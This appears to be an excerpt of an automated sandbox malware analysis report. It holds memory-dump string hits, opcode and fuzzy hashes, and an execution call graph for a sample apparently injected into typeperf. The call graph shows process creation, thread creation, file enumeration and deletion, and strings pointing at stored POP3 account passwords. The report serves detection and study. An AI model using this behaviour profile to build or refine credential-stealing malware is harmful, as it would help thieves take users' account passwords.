                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: $e$k$o
                                                                                                                        • API String ID: 0-3624523832
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: P$r$s$w
                                                                                                                        • API String ID: 0-3891800351
                                                                                                                        • Opcode ID: 8c553517bb72b524c024cf7534ce0408c9f14d13564f84e53c84fe60adcfbc1d
                                                                                                                        • Instruction ID: 80a2d7eeb1f2442efd7006d0d2f8b1879348a7b652a6a02f5ba4ae60d00afed7
                                                                                                                        • Opcode Fuzzy Hash: 8c553517bb72b524c024cf7534ce0408c9f14d13564f84e53c84fe60adcfbc1d
                                                                                                                        • Instruction Fuzzy Hash: D0511CB1D00208AFDB50DFA4D844BEEBBF5EF58710F14856AE919EB241E7359604CFA1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                                                                                        • API String ID: 0-2877786613
                                                                                                                        • Opcode ID: 2989952816021e9af3d65f9927e6cf2c5b45e8ab407827aa335cb008d5286a09
                                                                                                                        • Instruction ID: c8d275c9f1d0a2b867019270e32fab06af386c704db79cda886fcb1d06abe6d4
                                                                                                                        • Opcode Fuzzy Hash: 2989952816021e9af3d65f9927e6cf2c5b45e8ab407827aa335cb008d5286a09
                                                                                                                        • Instruction Fuzzy Hash: 1C318EB96012497AEB11EB909C5AFFF77BCAFA5710F004048FE046A181EB746A01C7F6
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                                                                                        • API String ID: 0-2877786613
                                                                                                                        • Opcode ID: 63c5ee0a0e5d20dc2edda046dcde8ce63623aa97b00afd5e0132c0108472894f
                                                                                                                        • Instruction ID: 70df91f29b48a35df750b29782798498d923f137d8a50dacf6176ad8f65b63fe
                                                                                                                        • Opcode Fuzzy Hash: 63c5ee0a0e5d20dc2edda046dcde8ce63623aa97b00afd5e0132c0108472894f
                                                                                                                        • Instruction Fuzzy Hash: 59316EB5A412597AEB11EB90DC59FFF777CAFA5714F004048FE046A180EB746A01C7E6
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: Account$POP3Account$POP3Password$Password
                                                                                                                        • API String ID: 0-3724906831
                                                                                                                        • Opcode ID: 9a317cd74a29aeb99fd516ca2b3bb033a1f37e2ed453038482b61e9f6c6d9915
                                                                                                                        • Instruction ID: d3b8f4ebd1d5fb724d31f0c36193c4cf2ced8fbe1e19c4a65ab9bc7d73f8087b
                                                                                                                        • Opcode Fuzzy Hash: 9a317cd74a29aeb99fd516ca2b3bb033a1f37e2ed453038482b61e9f6c6d9915
                                                                                                                        • Instruction Fuzzy Hash: 8D3184F2D00209BBDB14E7A4AC98EFF73BDAF94714F0045A5EE59A7100EA3096458FA1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: $e$h$o
                                                                                                                        • API String ID: 0-3662636641
                                                                                                                        • Opcode ID: 423a663da4b38d5c88ef4a275d5dca6a15bccf0517b859d25b5ebceeb7b575fb
                                                                                                                        • Instruction ID: 3127f2690160a0322d411cac5c56e1b3fcdd2a04ac65417019e3169e6f3b9ee2
                                                                                                                        • Opcode Fuzzy Hash: 423a663da4b38d5c88ef4a275d5dca6a15bccf0517b859d25b5ebceeb7b575fb
                                                                                                                        • Instruction Fuzzy Hash: 7D316FB1E00218BEDF50DBA49C49FEF73B8EF99700F044199A949A6150EB7457888FA2
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 1$1$2$6
                                                                                                                        • API String ID: 0-2783566374
                                                                                                                        • Opcode ID: cfdb0bd2f1969fb07bba72c82375319e5148e2c7066f36fa055981596ca8d8f8
                                                                                                                        • Instruction ID: 6283626773f0f75dfa6ba4bf0180f2269c66a4044b9b990ada367d40decea007
                                                                                                                        • Opcode Fuzzy Hash: cfdb0bd2f1969fb07bba72c82375319e5148e2c7066f36fa055981596ca8d8f8
                                                                                                                        • Instruction Fuzzy Hash: 2D314FB1E10209ABEB11DBA4DC45BEF73BCFF54304F008199E904A6240E775AA058BA5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: [$m$t$y
                                                                                                                        • API String ID: 0-3854059060
                                                                                                                        • Opcode ID: 69481cf968ff726dfffa150feb45b131cc131143ab88505d2b9d20da3706b2e5
                                                                                                                        • Instruction ID: 56a30e37e4d7ecde254d213418b9ed7d1a56581792347ea7ae2bfc04e9d52d2e
                                                                                                                        • Opcode Fuzzy Hash: 69481cf968ff726dfffa150feb45b131cc131143ab88505d2b9d20da3706b2e5
                                                                                                                        • Instruction Fuzzy Hash: D621ACB19007049BC724DF59E4489AFB7F9EF88310F10866EE84A9B710E7B5EA458BD0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: -$A$I$M
                                                                                                                        • API String ID: 0-1664541526
                                                                                                                        • Opcode ID: 57f0a877aed1c77d67a2b5ad59eacb8fe769536fd2ad85c2f7bdbd0daf0521fe
                                                                                                                        • Instruction ID: 70b5fe57eb20e794f2135883e242def16932a052ed646e868d2c4de40c90433b
                                                                                                                        • Opcode Fuzzy Hash: 57f0a877aed1c77d67a2b5ad59eacb8fe769536fd2ad85c2f7bdbd0daf0521fe
                                                                                                                        • Instruction Fuzzy Hash: FBF08272D01218AADF50DA94AC09BFE7BFCBB44314F4045A6ED4896281E7F26A58CBD1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Execution Graph

                                                                                                                        Execution Coverage:2.8%
                                                                                                                        Dynamic/Decrypted Code Coverage:2.2%
                                                                                                                        Signature Coverage:1.8%
                                                                                                                        Total number of Nodes:905
                                                                                                                        Total number of Limit Nodes:109
99247->99210 99322 702430 LdrLoadDll LdrInitializeThunk 99248->99322 99282 704fa0 99250->99282 99253 706d20 2 API calls 99251->99253 99254 6fa4d8 99253->99254 99254->99210 99255 6fa3a9 99291 6f6f60 99255->99291 99257 6fa412 99257->99230 99258 6fa41d 99257->99258 99259 706d20 2 API calls 99258->99259 99260 6fa441 99259->99260 99298 7048a0 99260->99298 99264 6fa47c 99265 6fa483 99264->99265 99266 7048a0 2 API calls 99264->99266 99265->99210 99267 6fa4a9 99266->99267 99313 704450 99267->99313 99269 6fa4b7 99269->99210 99271 7052bd 99270->99271 99272 705f10 LdrLoadDll 99271->99272 99273 7052ce CreateProcessInternalW 99272->99273 99273->99229 99275 7047e0 2 API calls 99274->99275 99276 6f515e 99275->99276 99276->99240 99278 704640 2 API calls 99277->99278 99279 6f5256 99278->99279 99280 704fa0 2 API calls 99279->99280 99281 6f526b 99280->99281 99281->99230 99281->99242 99281->99245 99283 704fc1 99282->99283 99284 705002 99282->99284 99286 705f10 LdrLoadDll 99283->99286 99285 705f10 LdrLoadDll 99284->99285 99287 705018 99285->99287 99288 704fde 99286->99288 99323 3032e80 LdrInitializeThunk 99287->99323 99288->99255 99289 705033 99289->99255 99292 6f6f7d 99291->99292 99324 704730 99292->99324 99294 6f6fcd 99295 6f6fd4 99294->99295 99296 7047e0 2 API calls 99294->99296 99295->99257 99297 6f6ffd 99296->99297 99297->99257 99299 7048ba 99298->99299 99300 705f10 LdrLoadDll 99299->99300 99301 7048cb 99300->99301 99334 3032d30 LdrInitializeThunk 99301->99334 99302 6fa455 99304 7047e0 99302->99304 99305 704801 99304->99305 99306 704856 99304->99306 99308 705f10 LdrLoadDll 99305->99308 99307 705f10 LdrLoadDll 99306->99307 99309 70486c 99307->99309 99310 70481e 99308->99310 99335 3032d10 LdrInitializeThunk 99309->99335 99310->99264 99311 70489b 99311->99264 99314 704471 99313->99314 99315 7044a6 99313->99315 99316 705f10 LdrLoadDll 99314->99316 99317 705f10 LdrLoadDll 99315->99317 99319 70448e 99316->99319 99318 7044bc 99317->99318 99336 3032fb0 LdrInitializeThunk 99318->99336 
99319->99269 99320 7044cb 99320->99269 99322->99239 99323->99289 99325 704797 99324->99325 99326 70474e 99324->99326 99328 705f10 LdrLoadDll 99325->99328 99327 705f10 LdrLoadDll 99326->99327 99330 70476b 99327->99330 99329 7047ad 99328->99329 99333 3032f30 LdrInitializeThunk 99329->99333 99330->99294 99331 7047d0 99331->99294 99333->99331 99334->99302 99335->99311 99336->99320 99337 6ff7a0 99338 6ff7c8 99337->99338 99339 6f41e0 LdrLoadDll 99338->99339 99340 6ff802 99339->99340 99366 6f59f0 99340->99366 99342 6ff82f 99343 6ff828 99343->99342 99344 6f41e0 LdrLoadDll 99343->99344 99345 6ff86b 99344->99345 99346 6f41e0 LdrLoadDll 99345->99346 99347 6ff8a0 99346->99347 99377 6f5b00 99347->99377 99349 6ff8c4 99350 6ff906 99349->99350 99364 6ffa9a 99349->99364 99381 6ff4f0 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 99349->99381 99352 6f41e0 LdrLoadDll 99350->99352 99353 6ff937 99352->99353 99354 6f5b00 2 API calls 99353->99354 99357 6ff95b 99354->99357 99355 6ff9a1 99356 6f5b00 2 API calls 99355->99356 99360 6ff9d1 99356->99360 99357->99355 99357->99364 99382 6ff4f0 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 99357->99382 99359 6ffa17 99362 6f5b00 2 API calls 99359->99362 99360->99359 99360->99364 99383 6ff4f0 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 99360->99383 99363 6ffa76 99362->99363 99363->99364 99384 6ff4f0 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 99363->99384 99367 6f5a23 99366->99367 99385 704ab0 99367->99385 99370 6f5a47 99370->99343 99374 6f5a82 99375 704f10 2 API calls 99374->99375 99376 6f5aea 99375->99376 99376->99343 99378 6f5b25 99377->99378 99400 7048e0 99378->99400 99381->99350 99382->99355 99383->99359 99384->99364 99386 704aca 99385->99386 99387 705f10 LdrLoadDll 99386->99387 99388 6f5a40 99387->99388 99388->99370 99389 704b00 99388->99389 99390 704b1d 99389->99390 99391 705f10 LdrLoadDll 99390->99391 99392 704b2e 99391->99392 99399 3032ca0 
LdrInitializeThunk 99392->99399 99393 6f5a6a 99393->99370 99395 705410 99393->99395 99396 70542a 99395->99396 99397 705f10 LdrLoadDll 99396->99397 99398 70543b 99397->99398 99398->99374 99399->99393 99401 7048fd 99400->99401 99402 705f10 LdrLoadDll 99401->99402 99403 70490e 99402->99403 99406 3032c60 LdrInitializeThunk 99403->99406 99404 6f5b99 99404->99349 99406->99404 99407 700460 99408 70047c 99407->99408 99419 704c00 99408->99419 99411 7004a4 99413 704f10 2 API calls 99411->99413 99412 7004b8 99414 704f10 2 API calls 99412->99414 99415 7004ad 99413->99415 99416 7004c1 99414->99416 99423 706e40 LdrLoadDll RtlAllocateHeap 99416->99423 99418 7004cc 99420 704c1d 99419->99420 99421 705f10 LdrLoadDll 99420->99421 99422 70049d 99421->99422 99422->99411 99422->99412 99423->99418 99424 707e60 99425 706d20 2 API calls 99424->99425 99426 707e75 99425->99426 99427 6f22ff 99428 6f59f0 3 API calls 99427->99428 99429 6f2323 99428->99429 99430 704ca0 99431 704d17 99430->99431 99432 704cbe 99430->99432 99433 705f10 LdrLoadDll 99431->99433 99434 705f10 LdrLoadDll 99432->99434 99435 704d2d NtCreateFile 99433->99435 99436 704cdb 99434->99436 99437 6f2c7c 99438 6f6dc0 3 API calls 99437->99438 99439 6f2c8c 99438->99439 99440 6f2cba 99439->99440 99441 6f2ca1 99439->99441 99442 704f10 2 API calls 99439->99442 99445 6ef700 LdrLoadDll 99441->99445 99442->99441 99444 6f2cab 99445->99444 99446 3032ad0 LdrInitializeThunk 99447 6f68b4 99448 6f683d 99447->99448 99449 6f68bb 99447->99449 99450 6f6852 99448->99450 99451 6fa110 12 API calls 99448->99451 99451->99450 99452 6f9c30 99457 6f9960 99452->99457 99454 6f9c3d 99477 6f9600 99454->99477 99456 6f9c43 99458 6f9985 99457->99458 99459 6f41e0 LdrLoadDll 99458->99459 99460 6f9a15 99459->99460 99461 6f41e0 LdrLoadDll 99460->99461 99462 6f9a74 99461->99462 99463 6f7380 2 API calls 99462->99463 99464 6f9abb 99463->99464 99465 6f9ac2 99464->99465 99466 701aa0 3 API calls 99464->99466 99465->99454 99468 6f9ad0 99466->99468 99467 6f9ad9 99467->99454 
99468->99467 99469 6f41e0 LdrLoadDll 99468->99469 99470 6f9b39 99469->99470 99472 6f9bc1 99470->99472 99489 6f9060 99470->99489 99474 6f9c19 99472->99474 99498 6f93c0 99472->99498 99475 706d20 2 API calls 99474->99475 99476 6f9c20 99475->99476 99476->99454 99478 6f9616 99477->99478 99485 6f9621 99477->99485 99479 706e00 2 API calls 99478->99479 99479->99485 99480 6f9637 99480->99456 99481 6f7380 2 API calls 99481->99485 99482 6f992e 99483 6f9947 99482->99483 99484 706d20 2 API calls 99482->99484 99483->99456 99484->99483 99485->99480 99485->99481 99485->99482 99486 6f9060 3 API calls 99485->99486 99487 6f41e0 LdrLoadDll 99485->99487 99488 6f93c0 2 API calls 99485->99488 99486->99485 99487->99485 99488->99485 99490 6f9086 99489->99490 99491 6fc5d0 2 API calls 99490->99491 99492 6f90ed 99491->99492 99493 6f910b 99492->99493 99494 6f926a 99492->99494 99495 6f924f 99493->99495 99502 6f8f30 99493->99502 99494->99495 99497 6f8f30 3 API calls 99494->99497 99495->99470 99497->99494 99499 6f93e6 99498->99499 99500 6fc5d0 2 API calls 99499->99500 99501 6f9462 99500->99501 99501->99472 99503 6f8f46 99502->99503 99506 6fcad0 99503->99506 99505 6f904e 99505->99493 99508 6fcb0d 99506->99508 99507 6fcbbd 99507->99505 99508->99507 99510 6fcb60 99508->99510 99513 6fdbc0 99508->99513 99511 6fcb99 99510->99511 99512 706d20 2 API calls 99510->99512 99511->99505 99512->99511 99516 6fd8d0 99513->99516 99515 6fdbd4 99515->99510 99517 6fd8f6 99516->99517 99519 706c90 2 API calls 99517->99519 99521 6fd916 99517->99521 99518 6fdbb2 99518->99515 99519->99521 99520 6fd9fe 99520->99518 99525 6fdb94 99520->99525 99529 6eb380 99520->99529 99521->99518 99521->99520 99522 6f41e0 LdrLoadDll 99521->99522 99523 6fda7a 99522->99523 99524 6f41e0 LdrLoadDll 99523->99524 99524->99520 99526 706d20 2 API calls 99525->99526 99528 6fdba4 99526->99528 99528->99515 99530 706c90 2 API calls 99529->99530 99531 6ec9f1 99530->99531 99531->99525 99532 6fb1b0 99533 6fb1d8 99532->99533 99534 706e00 2 API calls 
99533->99534 99536 6fb238 99534->99536 99535 6fb241 99536->99535 99563 6fa510 99536->99563 99538 6fb26a 99539 6fb28a 99538->99539 99593 6fa860 LdrLoadDll 99538->99593 99541 6fb2a8 99539->99541 99595 6fd040 LdrLoadDll GetFileAttributesW NtAllocateVirtualMemory RtlFreeHeap 99539->99595 99548 6fb2c2 99541->99548 99597 6f4050 LdrLoadDll 99541->99597 99542 6fb278 99542->99539 99594 6faee0 LdrLoadDll RtlFreeHeap 99542->99594 99545 6fb29c 99596 6fd040 LdrLoadDll GetFileAttributesW NtAllocateVirtualMemory RtlFreeHeap 99545->99596 99549 6fa510 4 API calls 99548->99549 99550 6fb2ef 99549->99550 99551 6fb310 99550->99551 99598 6fa860 LdrLoadDll 99550->99598 99552 6fb32e 99551->99552 99600 6fd040 LdrLoadDll GetFileAttributesW NtAllocateVirtualMemory RtlFreeHeap 99551->99600 99555 6fb348 99552->99555 99602 6f4050 LdrLoadDll 99552->99602 99559 706d20 2 API calls 99555->99559 99556 6fb2fe 99556->99551 99599 6faee0 LdrLoadDll RtlFreeHeap 99556->99599 99557 6fb322 99601 6fd040 LdrLoadDll GetFileAttributesW NtAllocateVirtualMemory RtlFreeHeap 99557->99601 99562 6fb352 99559->99562 99564 6fa5a8 99563->99564 99565 6f41e0 LdrLoadDll 99564->99565 99566 6fa66e 99565->99566 99567 6f41e0 LdrLoadDll 99566->99567 99568 6fa69a 99567->99568 99569 6f5b00 2 API calls 99568->99569 99570 6fa6bf 99569->99570 99571 6fa809 99570->99571 99603 7049a0 99570->99603 99573 6fa81d 99571->99573 99575 6f9e80 LdrLoadDll 99571->99575 99573->99538 99575->99573 99576 6fa7ff 99577 704f10 2 API calls 99576->99577 99577->99571 99578 6fa6f8 99579 704f10 2 API calls 99578->99579 99580 6fa732 99579->99580 99609 706ee0 LdrLoadDll 99580->99609 99582 6fa76b 99582->99573 99583 6f5b00 2 API calls 99582->99583 99584 6fa791 99583->99584 99584->99573 99585 7049a0 2 API calls 99584->99585 99586 6fa7b6 99585->99586 99587 6fa7bd 99586->99587 99588 6fa7e9 99586->99588 99590 704f10 2 API calls 99587->99590 99589 704f10 2 API calls 99588->99589 99591 6fa7f3 99589->99591 99592 6fa7c7 99590->99592 99591->99538 99592->99538 
99593->99542 99594->99539 99595->99545 99596->99541 99597->99548 99598->99556 99599->99551 99600->99557 99601->99552 99602->99555 99604 7049bd 99603->99604 99605 705f10 LdrLoadDll 99604->99605 99606 7049ce 99605->99606 99610 3032be0 LdrInitializeThunk 99606->99610 99607 6fa6ed 99607->99576 99607->99578 99609->99582 99610->99607 99611 703c10 99612 703c6a 99611->99612 99614 703c77 99612->99614 99615 7021c0 99612->99615 99616 706c90 2 API calls 99615->99616 99618 702201 99615->99618 99616->99618 99617 702306 99617->99614 99618->99617 99619 6f3f00 LdrLoadDll 99618->99619 99620 702247 99619->99620 99621 700900 LdrLoadDll 99620->99621 99623 70226c 99621->99623 99622 702280 Sleep 99622->99623 99623->99617 99623->99622 99634 7042d0 99635 7042f1 99634->99635 99636 704326 99634->99636 99638 705f10 LdrLoadDll 99635->99638 99637 705f10 LdrLoadDll 99636->99637 99639 70433c 99637->99639 99640 70430e 99638->99640 99643 30339b0 LdrInitializeThunk 99639->99643 99641 70434b 99643->99641 99644 704e90 99645 704eae 99644->99645 99646 704edf 99644->99646 99648 705f10 LdrLoadDll 99645->99648 99647 705f10 LdrLoadDll 99646->99647 99649 704ef5 NtDeleteFile 99647->99649 99650 704ecb 99648->99650 99663 700714 99664 7006cb 99663->99664 99665 70076c 99664->99665 99668 7035a0 99664->99668 99667 700770 99669 7035fd 99668->99669 99670 703634 99669->99670 99673 6ffe80 99669->99673 99670->99667 99672 703616 99672->99667 99674 6ffe0e 99673->99674 99675 6ffe8c 99673->99675 99676 706c90 2 API calls 99674->99676 99677 6ffe31 99676->99677 99677->99672 99678 6e9940 99679 6e994f 99678->99679 99680 700900 LdrLoadDll 99679->99680 99681 6e996a 99680->99681 99682 6e9990 99681->99682 99683 6e997d CreateThread 99681->99683 99684 6f8901 99692 6f8910 99684->99692 99685 6f8917 99686 700900 LdrLoadDll 99686->99692 99687 6f89ff GetFileAttributesW 99687->99692 99688 6f8baa 99689 6f8bc3 99688->99689 99690 706d20 2 API calls 99688->99690 99690->99689 99691 6f41e0 LdrLoadDll 99691->99692 99692->99685 99692->99686 
99692->99687 99692->99688 99692->99691 99693 6fc5d0 2 API calls 99692->99693 99696 7017d0 LdrLoadDll NtAllocateVirtualMemory RtlFreeHeap 99692->99696 99697 701680 LdrLoadDll NtAllocateVirtualMemory RtlFreeHeap 99692->99697 99693->99692 99696->99692 99697->99692 99698 6f6480 99699 6f64ae 99698->99699 99700 6f6f60 3 API calls 99699->99700 99701 6f64d6 99700->99701 99702 6f64dd 99701->99702 99705 706e40 LdrLoadDll RtlAllocateHeap 99701->99705 99704 6f64ed 99705->99704 99706 6fe5c0 99707 6fe624 99706->99707 99708 6f41e0 LdrLoadDll 99707->99708 99709 6fe717 99708->99709 99710 6f59f0 3 API calls 99709->99710 99712 6fe74d 99710->99712 99711 6fe754 99712->99711 99713 6f41e0 LdrLoadDll 99712->99713 99714 6fe790 99713->99714 99715 6f5b00 2 API calls 99714->99715 99717 6fe7d0 99715->99717 99716 6fe8f3 99717->99716 99718 6fe902 99717->99718 99740 6fe3a0 99717->99740 99719 704f10 2 API calls 99718->99719 99721 6fe90c 99719->99721 99722 6fe805 99722->99718 99723 6fe810 99722->99723 99724 706e00 2 API calls 99723->99724 99725 6fe839 99724->99725 99726 6fe858 99725->99726 99727 6fe842 99725->99727 99769 6fe290 CoInitialize 99726->99769 99728 704f10 2 API calls 99727->99728 99730 6fe84c 99728->99730 99731 6fe866 99771 704a50 99731->99771 99733 6fe8e2 99734 704f10 2 API calls 99733->99734 99735 6fe8ec 99734->99735 99738 706d20 2 API calls 99735->99738 99737 6fe884 99737->99733 99739 704a50 2 API calls 99737->99739 99777 6fe1c0 LdrLoadDll RtlFreeHeap 99737->99777 99738->99716 99739->99737 99741 6fe3bc 99740->99741 99742 6f3f00 LdrLoadDll 99741->99742 99744 6fe3da 99742->99744 99743 6fe3e3 99743->99722 99744->99743 99745 700900 LdrLoadDll 99744->99745 99746 6fe400 99745->99746 99747 700900 LdrLoadDll 99746->99747 99748 6fe41b 99747->99748 99749 700900 LdrLoadDll 99748->99749 99750 6fe434 99749->99750 99751 700900 LdrLoadDll 99750->99751 99752 6fe450 99751->99752 99753 700900 LdrLoadDll 99752->99753 99754 6fe469 99753->99754 99755 700900 LdrLoadDll 99754->99755 99756 6fe482 
99755->99756 99757 6f3f00 LdrLoadDll 99756->99757 99758 6fe4ae 99757->99758 99759 700900 LdrLoadDll 99758->99759 99768 6fe55d 99758->99768 99760 6fe4d3 99759->99760 99761 6f3f00 LdrLoadDll 99760->99761 99762 6fe508 99761->99762 99763 700900 LdrLoadDll 99762->99763 99762->99768 99764 6fe52b 99763->99764 99765 700900 LdrLoadDll 99764->99765 99766 6fe544 99765->99766 99767 700900 LdrLoadDll 99766->99767 99767->99768 99768->99722 99770 6fe2f5 99769->99770 99770->99731 99772 704a6d 99771->99772 99773 705f10 LdrLoadDll 99772->99773 99774 704a7e 99773->99774 99778 3032ba0 LdrInitializeThunk 99774->99778 99775 704a9d 99775->99737 99777->99737 99778->99775 99780 6fc150 99781 6fc172 99780->99781 99782 6f41e0 LdrLoadDll 99781->99782 99783 6fc363 99782->99783 99784 6f41e0 LdrLoadDll 99783->99784 99785 6fc388 99784->99785 99786 6f4120 LdrLoadDll 99785->99786 99787 6fc39c 99786->99787 99811 6fc010 99787->99811 99790 6fc010 6 API calls 99791 6fc412 99790->99791 99792 6fc010 6 API calls 99791->99792 99793 6fc42a 99792->99793 99794 6fc010 6 API calls 99793->99794 99795 6fc442 99794->99795 99796 6fc010 6 API calls 99795->99796 99797 6fc45d 99796->99797 99798 6fc010 6 API calls 99797->99798 99800 6fc475 99798->99800 99799 6fc48f 99800->99799 99801 6fc010 6 API calls 99800->99801 99802 6fc4c3 99801->99802 99803 6fc010 6 API calls 99802->99803 99804 6fc500 99803->99804 99805 6fc010 6 API calls 99804->99805 99806 6fc53d 99805->99806 99807 6fc010 6 API calls 99806->99807 99808 6fc57a 99807->99808 99809 6fc010 6 API calls 99808->99809 99810 6fc5b7 99809->99810 99812 6fc039 99811->99812 99813 700900 LdrLoadDll 99812->99813 99814 6fc079 99813->99814 99815 700900 LdrLoadDll 99814->99815 99816 6fc097 99815->99816 99817 700900 LdrLoadDll 99816->99817 99819 6fc0b9 99817->99819 99818 6fc13d 99818->99790 99819->99818 99820 6fc0e3 FindFirstFileW 99819->99820 99820->99818 99821 6fc0fe 99820->99821 99822 6fc124 FindNextFileW 99821->99822 99825 6fbf20 6 API calls 99821->99825 99822->99821 99824 
6fc136 FindClose 99822->99824 99824->99818 99825->99821

                                                                                                                        Control-flow Graph (graph not reproduced; legend: Executed, Not Executed)
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3837846912.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_6e0000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: !$#W$%v$&,$*$1$5v$6$$9$9$$9D$<N$A$J$M$P$T$V$Vd&,$aE$b$jN$l$p$st$z$|$|G$"
                                                                                                                        • API String ID: 0-826254412
                                                                                                                        • Opcode ID: 7cd60a9cbb5f6e2ea359a0a4d02b52131e6f2e15a0efc431cd9fd654ffd8d270
                                                                                                                        • Instruction ID: 620bc4be8959cb5ffcc463d4d42aebd623271ebaf54fe28b04f4ab4ef653381f
                                                                                                                        • Opcode Fuzzy Hash: 7cd60a9cbb5f6e2ea359a0a4d02b52131e6f2e15a0efc431cd9fd654ffd8d270
                                                                                                                        • Instruction Fuzzy Hash: 4A32DFB0D06268CBEB24CF45C8947DDBBB2BF85308F1081D9D1496B390D7B92A89DF55
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • FindFirstFileW.KERNELBASE(?,00000000), ref: 006FC0F4
                                                                                                                        • FindNextFileW.KERNELBASE(00000000,00000010), ref: 006FC12F
                                                                                                                        • FindClose.KERNELBASE(00000000), ref: 006FC13A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3837846912.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_6e0000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$File$CloseFirstNext
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3541575487-0
